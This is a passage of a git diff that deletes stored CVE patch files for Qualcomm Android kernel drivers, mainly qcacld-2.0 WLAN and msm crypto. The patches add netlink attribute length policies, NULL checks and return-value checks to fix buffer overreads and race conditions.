-+	 * for 32-bit usecase,it already copy the userspace
-+	 * data to local memory in msm_flash_subdev_do_ioctl()
-+	 * so here do not need copy from user
-+	 */
- 	return msm_flash_init(flash_ctrl, flash_data);
--}
- #else
--static int32_t msm_flash_init_prepare(
--	struct msm_flash_ctrl_t *flash_ctrl,
--	struct msm_flash_cfg_data_t *flash_data)
--{
- 	struct msm_flash_cfg_data_t flash_data_k;
- 	struct msm_flash_init_info_t flash_init_info;
- 	int32_t i = 0;
--
- 	flash_data_k.cfg_type = flash_data->cfg_type;
- 	for (i = 0; i < MAX_LED_TRIGGERS; i++) {
- 		flash_data_k.flash_current[i] =
-@@ -531,8 +553,8 @@ static int32_t msm_flash_init_prepare(
- 		return -EFAULT;
- 	}
- 	return msm_flash_init(flash_ctrl, &flash_data_k);
--}
- #endif
-+}
- 
- static int32_t msm_flash_low(
- 	struct msm_flash_ctrl_t *flash_ctrl,
diff --git a/Patches/Linux_CVEs/CVE-2017-11058/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11058/qcacld-2.0/0001.patch
deleted file mode 100644
index 772c38c8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11058/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,90 +0,0 @@
-From 4d9812973e8b12700afd8c3d6f36a94506ffb6fc Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Thu, 15 Jun 2017 10:51:02 -0700
-Subject: qcacld-2.0: Avoid overread when configuring MAC addresses
-
-Currently there are multiple cfg80211 vendor commands where MAC
-address attributes are defined in a nla_policy table with a type of
-NLA_UNSPEC but without a minimum length. Add the proper minimum length
-to avoid buffer overread.
-
-Change-Id: I11ff2bd813dc4e6784a7cdee66a0c10ca0e69fcf
-CRs-Fixed: 2061251
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 26 ++++++++++++++++++--------
- 1 file changed, 18 insertions(+), 8 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 1ac1fc1..2ec3d68 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -841,7 +841,9 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_CACHED_SCAN_RESULTS_CONFIG_PARAM_FLUSH] = { .type = NLA_U8 },
- 
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_CACHED_SCAN_RESULTS_CONFIG_PARAM_MAX] = { .type = NLA_U32 },
--    [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_BSSID] = { .type = NLA_UNSPEC },
-+    [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_BSSID] = {
-+        .type = NLA_UNSPEC,
-+        .len = HDD_MAC_ADDR_LEN},
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_RSSI_LOW] = { .type = NLA_S32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_RSSI_HIGH] = { .type = NLA_S32 },
-     [QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM_CHANNEL] = { .type = NLA_U32 },
-@@ -8080,7 +8082,9 @@ wlan_hdd_cfg80211_get_logger_supp_feature(struct wiphy *wiphy,
- static const struct nla_policy
- wlan_hdd_tdls_config_enable_policy[QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAX +1] =
- {
--    [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAC_ADDR] = {.type = NLA_UNSPEC },
-+    [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAC_ADDR] = {
-+        .type = NLA_UNSPEC,
-+        .len = HDD_MAC_ADDR_LEN},
-     [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_CHANNEL] = {.type = NLA_S32 },
-     [QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_GLOBAL_OPERATING_CLASS] =
-                                                        {.type = NLA_S32 },
-@@ -8092,15 +8096,18 @@ wlan_hdd_tdls_config_enable_policy[QCA_WLAN_VENDOR_ATTR_TDLS_ENABLE_MAX +1] =
- static const struct nla_policy
- wlan_hdd_tdls_config_disable_policy[QCA_WLAN_VENDOR_ATTR_TDLS_DISABLE_MAX +1] =
- {
--    [QCA_WLAN_VENDOR_ATTR_TDLS_DISABLE_MAC_ADDR] = {.type = NLA_UNSPEC },
--
-+    [QCA_WLAN_VENDOR_ATTR_TDLS_DISABLE_MAC_ADDR] = {
-+        .type = NLA_UNSPEC,
-+        .len = HDD_MAC_ADDR_LEN},
- };
- 
- static const struct nla_policy
- wlan_hdd_tdls_config_state_change_policy[
-                     QCA_WLAN_VENDOR_ATTR_TDLS_STATE_MAX +1] =
- {
--    [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_MAC_ADDR] = {.type = NLA_UNSPEC },
-+    [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_MAC_ADDR] = {
-+        .type = NLA_UNSPEC,
-+        .len = HDD_MAC_ADDR_LEN},
-     [QCA_WLAN_VENDOR_ATTR_TDLS_NEW_STATE] = {.type = NLA_U32 },
-     [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_REASON] = {.type = NLA_S32 },
-     [QCA_WLAN_VENDOR_ATTR_TDLS_STATE_CHANNEL] = {.type = NLA_U32 },
-@@ -8113,7 +8120,9 @@ static const struct nla_policy
- wlan_hdd_tdls_config_get_status_policy[
-                      QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_MAX +1] =
- {
--    [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_MAC_ADDR] = {.type = NLA_UNSPEC },
-+    [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_MAC_ADDR] = {
-+        .type = NLA_UNSPEC,
-+        .len = HDD_MAC_ADDR_LEN},
-     [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_STATE] = {.type = NLA_U32 },
-     [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_REASON] = {.type = NLA_S32 },
-     [QCA_WLAN_VENDOR_ATTR_TDLS_GET_STATUS_CHANNEL] = {.type = NLA_U32 },
-@@ -10761,8 +10770,9 @@ static int __wlan_hdd_cfg80211_wifi_logger_start(struct wiphy *wiphy,
- static const struct
- nla_policy
- qca_wlan_vendor_attr_policy[QCA_WLAN_VENDOR_ATTR_MAX+1] = {
--	[QCA_WLAN_VENDOR_ATTR_MAC_ADDR] =
--		{ .type = NLA_BINARY, .len = VOS_MAC_ADDR_SIZE },
-+	[QCA_WLAN_VENDOR_ATTR_MAC_ADDR] = {
-+		.type = NLA_BINARY,
-+		.len = HDD_MAC_ADDR_LEN},
- };
- 
- /**
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11059/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11059/ANY/0001.patch
deleted file mode 100644
index 6458e65d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11059/ANY/0001.patch
+++ /dev/null
@@ -1,83 +0,0 @@
-From be632ce97422dfe533944186e2f4420b87b87ad5 Mon Sep 17 00:00:00 2001
-From: Oleg Matcovschi <omatcovschi@google.com>
-Date: Wed, 9 Aug 2017 23:18:19 -0700
-Subject: [PATCH] crypto: msm: Fix several race condition issues in crypto
- drivers
-
-Check areq before referencing, replace xchg to automic_xchg and
-verify return values of set key during SHA operations.
-
-Bug: 37284397
-Signed-off-by: Brahmaji K <bkomma@codeaurora.org>
-Signed-off-by: Paresh Purabhiya <ppurab@codeaurora.org>
-Change-Id: I98a9541a1d3a8c8d5e974348c76b92da1d5102e6
----
- drivers/crypto/msm/qce50.c   |  4 ++++
- drivers/crypto/msm/qcrypto.c | 14 ++++++++++----
- 2 files changed, 14 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/crypto/msm/qce50.c b/drivers/crypto/msm/qce50.c
-index 0e017b3c0c3ff..6bd9d56b13566 100644
---- a/drivers/crypto/msm/qce50.c
-+++ b/drivers/crypto/msm/qce50.c
-@@ -2055,6 +2055,10 @@ static int _sha_complete(struct qce_device *pce_dev)
- 	uint32_t status;
- 
- 	areq = (struct ahash_request *) pce_dev->areq;
-+	if (!areq) {
-+		pr_err("sha operation error. areq is NULL\n");
-+		return -ENXIO;
-+	}
- 	qce_dma_unmap_sg(pce_dev->pdev, areq->src, pce_dev->src_nents,
- 				DMA_TO_DEVICE);
- 	memcpy(digest, (char *)(&pce_dev->ce_sps.result->auth_iv[0]),
-diff --git a/drivers/crypto/msm/qcrypto.c b/drivers/crypto/msm/qcrypto.c
-index 04b28a58e38bd..e64d1dd51cb5f 100644
---- a/drivers/crypto/msm/qcrypto.c
-+++ b/drivers/crypto/msm/qcrypto.c
-@@ -3514,6 +3514,7 @@ static int _sha1_hmac_setkey(struct crypto_ahash *tfm, const u8 *key,
- 							unsigned int len)
- {
- 	struct qcrypto_sha_ctx *sha_ctx = crypto_tfm_ctx(&tfm->base);
-+	int ret = 0;
- 	memset(&sha_ctx->authkey[0], 0, SHA1_BLOCK_SIZE);
- 	if (len <= SHA1_BLOCK_SIZE) {
- 		memcpy(&sha_ctx->authkey[0], key, len);
-@@ -3521,16 +3522,19 @@ static int _sha1_hmac_setkey(struct crypto_ahash *tfm, const u8 *key,
- 	} else {
- 		sha_ctx->alg = QCE_HASH_SHA1;
- 		sha_ctx->diglen = SHA1_DIGEST_SIZE;
--		_sha_hmac_setkey(tfm, key, len);
-+		ret = _sha_hmac_setkey(tfm, key, len);
-+		if (ret)
-+			pr_err("SHA1 hmac setkey failed\n");
- 		sha_ctx->authkey_in_len = SHA1_BLOCK_SIZE;
- 	}
--	return 0;
-+	return ret;
- }
- 
- static int _sha256_hmac_setkey(struct crypto_ahash *tfm, const u8 *key,
- 							unsigned int len)
- {
- 	struct qcrypto_sha_ctx *sha_ctx = crypto_tfm_ctx(&tfm->base);
-+	int ret = 0;
- 
- 	memset(&sha_ctx->authkey[0], 0, SHA256_BLOCK_SIZE);
- 	if (len <= SHA256_BLOCK_SIZE) {
-@@ -3539,11 +3543,13 @@ static int _sha256_hmac_setkey(struct crypto_ahash *tfm, const u8 *key,
- 	} else {
- 		sha_ctx->alg = QCE_HASH_SHA256;
- 		sha_ctx->diglen = SHA256_DIGEST_SIZE;
--		_sha_hmac_setkey(tfm, key, len);
-+		ret = _sha_hmac_setkey(tfm, key, len);
-+		if (ret)
-+			pr_err("SHA256 hmac setkey failed\n");
- 		sha_ctx->authkey_in_len = SHA256_BLOCK_SIZE;
- 	}
- 
--	return 0;
-+	return ret;
- }
- 
- static int _sha_hmac_init_ihash(struct ahash_request *req,
diff --git a/Patches/Linux_CVEs/CVE-2017-11060/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11060/qcacld-2.0/0001.patch
deleted file mode 100644
index 2000cbb1..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11060/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,116 +0,0 @@
-From 657bb41463b837b2681e1fed310bd97970b09b83 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@codeaurora.org>
-Date: Mon, 19 Jun 2017 19:21:42 +0530
-Subject: qcacld-2.0: Avoid buffer overread when parsing PNO commands
-
-Propagation from qcacld-3.0 to qcacld-2.0
-
-There are currently three issues which can result in a buffer overread
-when processing PNO vendor commands:
-1) __wlan_hdd_cfg80211_set_passpoint_list() specifies the wrong policy
-   when invoking nla_parse().
-2) hdd_extscan_passpoint_fill_network_list() does not specify a policy
-   when invoking nla_parse().
-3) __wlan_hdd_cfg80211_set_epno_list() specifies a policy but not all
-   of the attributes that are parsed are present in the policy.
-To prevent buffer overread:
-1) Update __wlan_hdd_cfg80211_set_passpoint_list() and
-   hdd_extscan_passpoint_fill_network_list() to use the policy
-   wlan_hdd_pno_config_policy.
-2) Update wlan_hdd_pno_config_policy to contain all the fixed-length
-   attributes needed by __wlan_hdd_cfg80211_set_passpoint_list(),
-   hdd_extscan_passpoint_fill_network_list(), and
-   __wlan_hdd_cfg80211_set_epno_list().
-
-Change-Id: I4a20e77ce87967ae78323b83a2aa9085fed2647f
-CRs-Fixed: 2058447
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 58 +++++++++++++++++++++++++++++-----------
- 1 file changed, 43 insertions(+), 15 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index cae8b45..20f127b 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -868,19 +868,46 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
- 
- static const struct nla_policy
- wlan_hdd_pno_config_policy[QCA_WLAN_VENDOR_ATTR_PNO_MAX + 1] = {
--	[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_NUM_NETWORKS] = {
--		.type = NLA_U32
--	},
--	[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_SSID] = {
--		.type = NLA_BINARY,
--		.len = IEEE80211_MAX_SSID_LEN + 1
--	},
--	[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_FLAGS] = {
--		.type = NLA_U8
--	},
--	[QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_AUTH_BIT] = {
--		.type = NLA_U8
--	},
-+    [QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM] = {
-+        .type = NLA_U32
-+    },
-+    [QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_NETWORK_PARAM_ID] = {
-+        .type = NLA_U32
-+    },
-+    [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_NUM_NETWORKS] = {
-+        .type = NLA_U32
-+    },
-+    [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_SSID] = {
-+        .type = NLA_BINARY,
-+        .len = IEEE80211_MAX_SSID_LEN + 1
-+    },
-+    [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_FLAGS] = {
-+        .type = NLA_U8
-+    },
-+    [QCA_WLAN_VENDOR_ATTR_PNO_SET_LIST_PARAM_EPNO_NETWORK_AUTH_BIT] = {
-+        .type = NLA_U8
-+    },
-+    [QCA_WLAN_VENDOR_ATTR_EPNO_MIN5GHZ_RSSI] = {
-+        .type = NLA_U32
-+    },
-+    [QCA_WLAN_VENDOR_ATTR_EPNO_MIN24GHZ_RSSI] = {
-+        .type = NLA_U32
-+    },
-+    [QCA_WLAN_VENDOR_ATTR_EPNO_INITIAL_SCORE_MAX] = {
-+        .type = NLA_U32
-+    },
-+    [QCA_WLAN_VENDOR_ATTR_EPNO_CURRENT_CONNECTION_BONUS] = {
-+        .type = NLA_U32
-+    },
-+    [QCA_WLAN_VENDOR_ATTR_EPNO_SAME_NETWORK_BONUS] = {
-+        .type = NLA_U32
-+    },
-+    [QCA_WLAN_VENDOR_ATTR_EPNO_SECURE_BONUS] = {
-+        .type = NLA_U32
-+    },
-+    [QCA_WLAN_VENDOR_ATTR_EPNO_BAND5GHZ_BONUS] = {
-+        .type = NLA_U32
-+    },
- };
- 
- static const struct nla_policy
-@@ -4914,7 +4941,8 @@ static int hdd_extscan_passpoint_fill_network_list(
- 
- 		if (nla_parse(network,
- 			QCA_WLAN_VENDOR_ATTR_PNO_MAX,
--			nla_data(networks), nla_len(networks), NULL)) {
-+			nla_data(networks), nla_len(networks),
-+			wlan_hdd_pno_config_policy)) {
- 			hddLog(LOGE, FL("nla_parse failed"));
- 			return -EINVAL;
- 		}
-@@ -5015,7 +5043,7 @@ static int __wlan_hdd_cfg80211_set_passpoint_list(struct wiphy *wiphy,
- 	}
- 
- 	if (nla_parse(tb, QCA_WLAN_VENDOR_ATTR_PNO_MAX, data, data_len,
--		wlan_hdd_extscan_config_policy)) {
-+		wlan_hdd_pno_config_policy)) {
- 		hddLog(LOGE, FL("Invalid ATTR"));
- 		return -EINVAL;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11061/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11061/qcacld-2.0/0001.patch
deleted file mode 100644
index 3e8a5fac..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11061/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,110 +0,0 @@
-From e08628a3cfe039bc4bdd7fc66f5ec7a59a97b404 Mon Sep 17 00:00:00 2001
-From: Ravi Kumar Bokka <brkum@codeaurora.org>
-Date: Mon, 12 Jun 2017 21:34:30 +0530
-Subject: qcacld-2.0: Validate vendor set roaming params command
-
-Currently there is no nl policy defined for vendor sub command
-QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX which may result in
-buffer overread error.
-
-To resolve this, add nl policy.
-
-Change-Id: Ib5d3c34dbcec29a98766753efc4e9c4ecf748c2e
-CRs-Fixed: 2059701
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 51 ++++++++++++++++++++++++++++++++++++----
- 1 file changed, 47 insertions(+), 4 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 57ba680..313de1e 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -1870,6 +1870,49 @@ wlan_hdd_cfg80211_get_concurrency_matrix(struct wiphy *wiphy,
- 	return ret;
- }
- 
-+#define MAX_ROAMING_PARAM \
-+       QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX
-+
-+static const struct nla_policy
-+wlan_hdd_set_roam_param_policy[MAX_ROAMING_PARAM + 1] = {
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_SUBCMD] = {.type = NLA_U32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_REQ_ID] = {.type = NLA_U32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_WHITE_LIST_SSID_NUM_NETWORKS] = {
-+					.type = NLA_U32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_WHITE_LIST_SSID_LIST] = {
-+					.type = NLA_U32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_WHITE_LIST_SSID] = {
-+					.type = NLA_U32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_A_BAND_BOOST_THRESHOLD] = {
-+					.type = NLA_S32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_A_BAND_PENALTY_THRESHOLD] = {
-+					.type = NLA_S32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_A_BAND_BOOST_FACTOR] = {
-+					.type = NLA_U32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_A_BAND_PENALTY_FACTOR] = {
-+					.type = NLA_U32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_A_BAND_MAX_BOOST] = {
-+					.type = NLA_U32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_LAZY_ROAM_HISTERESYS] = {
-+					.type = NLA_S32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_ALERT_ROAM_RSSI_TRIGGER] = {
-+					.type = NLA_U32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_ENABLE] = {
-+					.type = NLA_S32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID] = {
-+					.type = NLA_U32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_BSSID] = {
-+					.type = NLA_BINARY,
-+					.len = MAC_ADDRESS_STR_LEN},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_RSSI_MODIFIER] = {
-+					.type = NLA_U32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_NUM_BSSID] = {
-+					.type = NLA_U32},
-+	[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_BSSID] = {
-+					.type = NLA_BINARY,
-+					.len = MAC_ADDRESS_STR_LEN},
-+};
-+
- static int
- __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
-                                    struct wireless_dev *wdev,
-@@ -1901,7 +1944,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 
- 	if (nla_parse(tb, QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- 		data, data_len,
--		NULL)) {
-+		wlan_hdd_set_roam_param_policy)) {
- 		hddLog(LOGE, FL("Invalid ATTR"));
- 		return -EINVAL;
- 	}
-@@ -1940,7 +1983,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 				if (nla_parse(tb2,
- 					QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_MAX,
- 					nla_data(curr_attr), nla_len(curr_attr),
--					NULL)) {
-+					wlan_hdd_set_roam_param_policy)) {
- 					hddLog(LOGE, FL("nla_parse failed"));
- 					goto fail;
- 				}
-@@ -2104,7 +2147,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 			if (nla_parse(tb2,
- 				QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- 				nla_data(curr_attr), nla_len(curr_attr),
--				NULL)) {
-+				wlan_hdd_set_roam_param_policy)) {
- 				hddLog(LOGE, FL("nla_parse failed"));
- 				goto fail;
- 			}
-@@ -2166,7 +2209,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 				if (nla_parse(tb2,
- 					QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- 					nla_data(curr_attr), nla_len(curr_attr),
--					NULL)) {
-+					wlan_hdd_set_roam_param_policy)) {
- 					hddLog(LOGE, FL("nla_parse failed"));
- 					goto fail;
- 				}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11062/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11062/qcacld-2.0/0001.patch
deleted file mode 100644
index 7f64a118..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11062/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From 954bdf216ce56a860092fd9549229b036e08c97b Mon Sep 17 00:00:00 2001
-From: Ashish Kumar Dhanotiya <adhanoti@codeaurora.org>
-Date: Tue, 13 Jun 2017 18:41:49 +0530
-Subject: qcacld-2.0: Validate vendor command do_acs
-
-Currently attributes are not validated in __wlan_hdd_cfg80211_do_acs,
-this can lead to a buffer overread.
-
-To resolve this issue, Define an nla_policy and validate the
-attributes.
-
-CRs-Fixed: 2058448
-Change-Id: Ic1bd5abbef09407f925625b709f10cf9cb7c3d7f
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 27 +++++++++++++--------------
- 1 file changed, 13 insertions(+), 14 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 2ec3d68..c87f7c0 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -9170,9 +9170,20 @@ static void
- wlan_hdd_set_mcc_to_scc_switch(hdd_adapter_t *adapter)
- {}
- #endif
-+static const struct nla_policy
-+wlan_hdd_cfg80211_do_acs_policy[QCA_WLAN_VENDOR_ATTR_ACS_MAX+1] = {
-+	[QCA_WLAN_VENDOR_ATTR_ACS_HW_MODE] = { .type = NLA_U8 },
-+	[QCA_WLAN_VENDOR_ATTR_ACS_HT_ENABLED] = { .type = NLA_FLAG },
-+	[QCA_WLAN_VENDOR_ATTR_ACS_HT40_ENABLED] = { .type = NLA_FLAG },
-+	[QCA_WLAN_VENDOR_ATTR_ACS_VHT_ENABLED] = { .type = NLA_FLAG },
-+	[QCA_WLAN_VENDOR_ATTR_ACS_CHWIDTH] = { .type = NLA_U16 },
-+	[QCA_WLAN_VENDOR_ATTR_ACS_CH_LIST] = { .type = NLA_UNSPEC },
-+};
-+
- 
- /**
-- * __wlan_hdd_cfg80211_do_acs : CFG80211 handler fucntion for DO_ACS Vendor CMD
-+ * __wlan_hdd_cfg80211_do_acs() : CFG80211 handler fucntion for DO_ACS
-+ * Vendor CMD
-  * @wiphy:  Linux wiphy struct pointer
-  * @wdev:   Linux wireless device struct pointer
-  * @data:   ACS information from hostapd
-@@ -9216,18 +9227,6 @@ static int __wlan_hdd_cfg80211_do_acs(struct wiphy *wiphy,
- 	 * config shall be set only from start_acs.
- 	 */
- 
--	/* nla_policy Policy template. Policy not applied as some attributes are
--	 * optional and QCA_WLAN_VENDOR_ATTR_ACS_CH_LIST has variable length
--	 *
--	 * [QCA_WLAN_VENDOR_ATTR_ACS_HW_MODE] = { .type = NLA_U8 },
--	 * [QCA_WLAN_VENDOR_ATTR_ACS_HT_ENABLED] = { .type = NLA_FLAG },
--	 * [QCA_WLAN_VENDOR_ATTR_ACS_HT40_ENABLED] = { .type = NLA_FLAG },
--	 * [QCA_WLAN_VENDOR_ATTR_ACS_VHT_ENABLED] = { .type = NLA_FLAG },
--	 * [QCA_WLAN_VENDOR_ATTR_ACS_CHWIDTH] = { .type = NLA_U16 },
--	 * [QCA_WLAN_VENDOR_ATTR_ACS_CH_LIST] = { .type = NLA_NESTED },
--	 */
--
--
- 	status = wlan_hdd_validate_context(hdd_ctx);
- 	if (0 != status)
- 		return status;
-@@ -9257,7 +9256,7 @@ static int __wlan_hdd_cfg80211_do_acs(struct wiphy *wiphy,
- 	vos_mem_zero(&sap_config->acs_cfg, sizeof(struct sap_acs_cfg));
- 
- 	status = nla_parse(tb, QCA_WLAN_VENDOR_ATTR_ACS_MAX, data, data_len,
--						NULL);
-+						wlan_hdd_cfg80211_do_acs_policy);
- 	if (status) {
- 		hddLog(VOS_TRACE_LEVEL_ERROR, FL("Invalid ATTR"));
- 		goto out;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11064/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11064/qcacld-2.0/0001.patch
deleted file mode 100644
index 7cf55ffb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11064/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From 38d6f16b8583bae6a1881c744ae08d609c99cb7e Mon Sep 17 00:00:00 2001
-From: Ashish Kumar Dhanotiya <adhanoti@codeaurora.org>
-Date: Fri, 14 Jul 2017 15:25:52 +0530
-Subject: qcacld-2.0: Add an attribute to represent PNO/EPNO Request ID
-
-This request ID was wrongly referred from the REQUEST_ID in
-enum qca_wlan_vendor_attr_gscan_config_params which is mapped to
-QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM in PNO Config.
-Hence define a different attribute to represent the request ID
-for the PNO Config.
-
-CRs-Fixed: 2066628
-Change-Id: I2b5efe78605d07d92db564a987ea0ae4ff0a2cc8
----
- CORE/HDD/inc/wlan_hdd_cfg80211.h | 2 ++
- CORE/HDD/src/wlan_hdd_cfg80211.c | 7 +++++--
- 2 files changed, 7 insertions(+), 2 deletions(-)
-
-diff --git a/CORE/HDD/inc/wlan_hdd_cfg80211.h b/CORE/HDD/inc/wlan_hdd_cfg80211.h
-index 2a2f7d9..291ebd6 100644
---- a/CORE/HDD/inc/wlan_hdd_cfg80211.h
-+++ b/CORE/HDD/inc/wlan_hdd_cfg80211.h
-@@ -1417,6 +1417,8 @@ enum qca_wlan_vendor_attr_pno_config_params {
- 	 */
- 	QCA_WLAN_VENDOR_ATTR_EPNO_BAND5GHZ_BONUS = 22,
- 
-+        /* Unsigned 32-bit value, representing the PNO Request ID */
-+        QCA_WLAN_VENDOR_ATTR_PNO_CONFIG_REQUEST_ID = 23,
- 
- 	/* keep last */
- 	QCA_WLAN_VENDOR_ATTR_PNO_AFTER_LAST,
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 2ec4ca3..8279b8f 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -908,6 +908,9 @@ wlan_hdd_pno_config_policy[QCA_WLAN_VENDOR_ATTR_PNO_MAX + 1] = {
-     [QCA_WLAN_VENDOR_ATTR_EPNO_BAND5GHZ_BONUS] = {
-         .type = NLA_U32
-     },
-+    [QCA_WLAN_VENDOR_ATTR_PNO_CONFIG_REQUEST_ID] = {
-+         .type = NLA_U32
-+    },
- };
- 
- static const struct nla_policy
-@@ -4772,12 +4775,12 @@ static int __wlan_hdd_cfg80211_set_epno_list(struct wiphy *wiphy,
- 	req_msg->num_networks = num_networks;
- 
- 	/* Parse and fetch request Id */
--	if (!tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID]) {
